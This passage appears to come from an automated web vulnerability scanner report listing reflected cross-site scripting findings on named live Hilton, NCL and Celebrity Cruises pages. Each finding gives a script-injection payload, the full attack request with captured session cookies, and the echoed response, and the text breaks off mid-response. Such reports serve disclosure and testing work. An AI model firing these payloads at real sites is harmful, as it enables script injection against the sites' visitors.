4.73. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7531"><img%20src%3da%20onerror%3dalert(1)>d0da59357ed was submitted in the REST URL parameter 4. This input was echoed as f7531"><img src=a onerror=alert(1)>d0da59357ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusettsf7531"><img%20src%3da%20onerror%3dalert(1)>d0da59357ed/dining.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:06:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:17:59 GMT;path=/
Content-Length: 49103


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<a href="/es/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusettsf7531"><img src=a onerror=alert(1)>d0da59357ed/dining.do" class="languageLink">
...[SNIP]...
4.74. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0f60"><img%20src%3da%20onerror%3dalert(1)>97a197d7df7 was submitted in the REST URL parameter 4. This input was echoed as f0f60"><img src=a onerror=alert(1)>97a197d7df7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusettsf0f60"><img%20src%3da%20onerror%3dalert(1)>97a197d7df7/directions.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:07:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:18:07 GMT;path=/
Content-Length: 65501


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<a href="/es/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusettsf0f60"><img src=a onerror=alert(1)>97a197d7df7/directions.do" class="languageLink">
...[SNIP]...
4.75. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0e62"><img%20src%3da%20onerror%3dalert(1)>eb63c238a1e was submitted in the REST URL parameter 4. This input was echoed as e0e62"><img src=a onerror=alert(1)>eb63c238a1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusettse0e62"><img%20src%3da%20onerror%3dalert(1)>eb63c238a1e/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:07:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:18:06 GMT;path=/
Content-Length: 85206


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
<a href="/es/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusettse0e62"><img src=a onerror=alert(1)>eb63c238a1e/index.do" class="languageLink">
...[SNIP]...
4.76. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8520e"><img%20src%3da%20onerror%3dalert(1)>e41feaea175 was submitted in the REST URL parameter 4. This input was echoed as 8520e"><img src=a onerror=alert(1)>e41feaea175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts8520e"><img%20src%3da%20onerror%3dalert(1)>e41feaea175/localguide.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:06:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:17:56 GMT;path=/
Content-Length: 47502


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<a href="/es/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts8520e"><img src=a onerror=alert(1)>e41feaea175/localguide.do" class="languageLink">
...[SNIP]...
4.77. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e697"><img%20src%3da%20onerror%3dalert(1)>dc3906d35ca was submitted in the REST URL parameter 4. This input was echoed as 3e697"><img src=a onerror=alert(1)>dc3906d35ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts3e697"><img%20src%3da%20onerror%3dalert(1)>dc3906d35ca/services.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:06:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:17:47 GMT;path=/
Content-Length: 45442


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="
...[SNIP]...
<a href="/es/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts3e697"><img src=a onerror=alert(1)>dc3906d35ca/services.do" class="languageLink">
...[SNIP]...
4.78. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH/index.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45db3"><img%20src%3da%20onerror%3dalert(1)>0f6e1a8e424 was submitted in the REST URL parameter 4. This input was echoed as 45db3"><img src=a onerror=alert(1)>0f6e1a8e424 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_US/hi/hotel/BOSLHHH45db3"><img%20src%3da%20onerror%3dalert(1)>0f6e1a8e424/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149& HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; NSC_qse-qgt=44153d5f3660; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.996; mmid=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635640479:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 85133
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:55:01 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:06:01 GMT;path=/


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
<a href="/es/hi/hotel/BOSLHHH45db3"><img src=a onerror=alert(1)>0f6e1a8e424/index.do" class="languageLink">
...[SNIP]...
4.79. https://www2.ncl.com/vacations [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /vacations

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6ac7"><script>alert(1)</script>c7ba114d195 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vacationsf6ac7"><script>alert(1)</script>c7ba114d195 HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 13:08:38 +0000
Cache-Control: public, max-age=0
ETag: "1317647318-1"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Vary: Cookie
Date: Mon, 03 Oct 2011 13:08:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R1788641230; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:08:40 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:08:40 GMT; path=/; domain=ncl.com
Content-Length: 37304

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<link rel="canonical" href="/vacationsf6ac7"><script>alert(1)</script>c7ba114d195">
...[SNIP]...
4.80. http://www3.hilton.com/en_US/hi/search/findhotels/index.htm [arrivalDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/index.htm

Issue detail

The value of the arrivalDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b177"><script>alert(1)</script>8f5e156a068 was submitted in the arrivalDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /en_US/hi/search/findhotels/index.htm HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
Content-Length: 1019
Cache-Control: max-age=0
Origin: http://www3.hilton.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.974; mmid=3550783%7CBAAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=3550783%7CBAAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635670296:ss=1317635584777

searchType=ALL&searchQuery=BOS+-+Logan+International+Airport%2C+MA&radiusFromLocation=40&radiusUnits=MILES&arrivalDate=1b177"><script>alert(1)</script>8f5e156a068&departureDate=04+Oct+2011&_flexibleDates=on&_rewardBooking=on&numberOfRooms=1&numberOfAdults%5B0%5D=1&numberOfChildren%5B0%5D=0&numberOfAdults%5B1%5D=1&numberOfChildren%5B1%5D=0&numberOfAdults%5B2%5D
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:56:04 GMT
Content-Length: 44738
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
<input id="checkin" name="arrivalDate" class="text date" value="03 Oct 2011" type="text" value="1b177"><script>alert(1)</script>8f5e156a068" maxlength="11"/>
...[SNIP]...
4.81. http://www3.hilton.com/en_US/hi/search/findhotels/index.htm [departureDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/index.htm

Issue detail

The value of the departureDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2388"><script>alert(1)</script>90bd9717f9c was submitted in the departureDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /en_US/hi/search/findhotels/index.htm HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
Content-Length: 1019
Cache-Control: max-age=0
Origin: http://www3.hilton.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.974; mmid=3550783%7CBAAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=3550783%7CBAAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635670296:ss=1317635584777

searchType=ALL&searchQuery=BOS+-+Logan+International+Airport%2C+MA&radiusFromLocation=40&radiusUnits=MILES&arrivalDate=03+Oct+2011&departureDate=a2388"><script>alert(1)</script>90bd9717f9c&_flexibleDates=on&_rewardBooking=on&numberOfRooms=1&numberOfAdults%5B0%5D=1&numberOfChildren%5B0%5D=0&numberOfAdults%5B1%5D=1&numberOfChildren%5B1%5D=0&numberOfAdults%5B2%5D=1&numberOfChildren%5B2%5D
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 44572
Date: Mon, 03 Oct 2011 12:56:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
<input id="checkout" name="departureDate" class="text date" value="04 Oct 2011" type="text" value="a2388"><script>alert(1)</script>90bd9717f9c" maxlength="11"/>
...[SNIP]...
4.82. http://www3.hilton.com/es/hi/doxch.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /es/hi/doxch.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a39f0"><script>alert(1)</script>2f0137ad299 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/hi/doxch.htm?dst=http://PFS-HI/es/hi/index.do&a39f0"><script>alert(1)</script>2f0137ad299=1 HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Apache
Content-Length: 7677
Content-Language: en
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:57 GMT
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Date: Mon, 03 Oct 2011 13:03:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xht
...[SNIP]...
<a href="/es/hi/transition/interim/index.htm?ori_url=%2Fes%2Fhi%2Fdoxch.htm&ori-a39f0"><script>alert(1)</script>2f0137ad299=1&ori-dst=http%3A%2F%2FPFS-HI%2Fes%2Fhi%2Findex.do&dst_url=http%3A%2F%2FATG-HI%2Fen%2Fhi%2Fpromotions%2Findex.jhtml&dst-it=Tnav%2CSP">
...[SNIP]...
4.83. http://www3.hilton.com/fr/hi/doxch.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /fr/hi/doxch.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9af34"><script>alert(1)</script>0837ca8ad61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/hi/doxch.htm?dst=http://PFS-HI/fr/hi/index.do&9af34"><script>alert(1)</script>0837ca8ad61=1 HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Apache
Content-Length: 7685
Content-Language: en
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:57 GMT
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Date: Mon, 03 Oct 2011 13:03:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xht
...[SNIP]...
<a href="/fr/hi/transition/interim/index.htm?ori_url=%2Ffr%2Fhi%2Fdoxch.htm&ori-dst=http%3A%2F%2FPFS-HI%2Ffr%2Fhi%2Findex.do&ori-9af34"><script>alert(1)</script>0837ca8ad61=1&dst_url=http%3A%2F%2FATG-HI%2Fen%2Fhi%2Fpromotions%2Findex.jhtml&dst-it=Tnav%2CSP">
...[SNIP]...
4.84. http://www.celebritycruises.com/explore/ships/detail.do [JSESSIONID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /explore/ships/detail.do

Issue detail

The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload a8820<script>alert(1)</script>57aadbf14b4 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /explore/ships/detail.do?shipCode=SI&tab=sailings%2Fexplore%2Fships%2Fsailings.do%3Fpagename%3Dship_SI%26shipCode%3DSI&cS=Homepage&ICID=Cel_11Q4_web_hp_body_Silhouette_US HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027a8820<script>alert(1)</script>57aadbf14b4; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20s_cc%3Dtrue%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3Dcelebritycruiseprod%253D%252526pid%25253Dhomepageus%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.celebritycruises.com%2525252Fexplore%2525252Fships%2525252Fdetail.do%2525253FshipCode%2525253DSI%25252526tab%2525253Dsailings%252525252Fexplore%252525252Fships%252525252%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 74972
Date: Mon, 03 Oct 2011 12:47:36 GMT
Connection: close
Set-Cookie: JSESSIONID=0000ykN6E5sA1XW-S_iYfk3OH8l:12hdbcveb; Path=/; Domain=celebritycruises.com
Set-Cookie: wuc=USA; Expires=Wed, 02 Oct 2013 12:47:35 GMT; Path=/; Domain=.celebritycruises.com


   <!DOCTYPE html>
<html>
   <head>
       <meta charset="utf-8">
       
           
                           <title>Celebrity Silhouette | Celebrity Cruises</title>
   <meta property="og:ti
...[SNIP]...
<p style="color: #333;">
Build: cel_com_09222011_1 2011-09-20 04:30 AM
last recached on Mon Oct 03 06:27:56 EDT 2011 000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027a8820<script>alert(1)</script>57aadbf14b4
</p>
...[SNIP]...
4.85. http://www.celebritycruises.com/search/loadCruiseConfigurator.do [JSESSIONID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /search/loadCruiseConfigurator.do

Issue detail

The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload dfd2e<script>alert(1)</script>3152c661bf6 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /search/loadCruiseConfigurator.do HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027dfd2e<script>alert(1)</script>3152c661bf6; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20s_cc%3Dtrue%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3Dcelebritycruiseprod%253D%252526pid%25253Dhomepageus%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.celebritycruises.com%2525252Fsearch%2525252FloadCruiseConfigurator.do%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 87109
Date: Mon, 03 Oct 2011 12:47:23 GMT
Connection: close
Set-Cookie: JSESSIONID=0000kD1KrGb77Npa34CKwsDYS25:12hdbcuh7; Path=/; Domain=celebritycruises.com
Set-Cookie: wuc=USA; Expires=Wed, 02 Oct 2013 12:47:22 GMT; Path=/; Domain=.celebritycruises.com


   <!DOCTYPE html>
<html>
   <head>
       <meta charset="utf-8">
       
           
